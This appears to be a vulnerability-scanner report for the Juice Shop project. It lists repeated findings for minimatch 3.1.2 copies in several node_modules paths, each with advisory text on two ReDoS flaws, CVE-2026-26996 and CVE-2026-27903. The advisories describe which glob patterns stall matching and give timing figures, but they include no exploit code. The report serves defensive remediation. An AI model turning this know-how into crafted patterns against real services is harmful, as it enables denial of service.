+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 136: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 137: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 138: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 139: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 140: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 141: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 142: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 143: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 144: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 145: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD 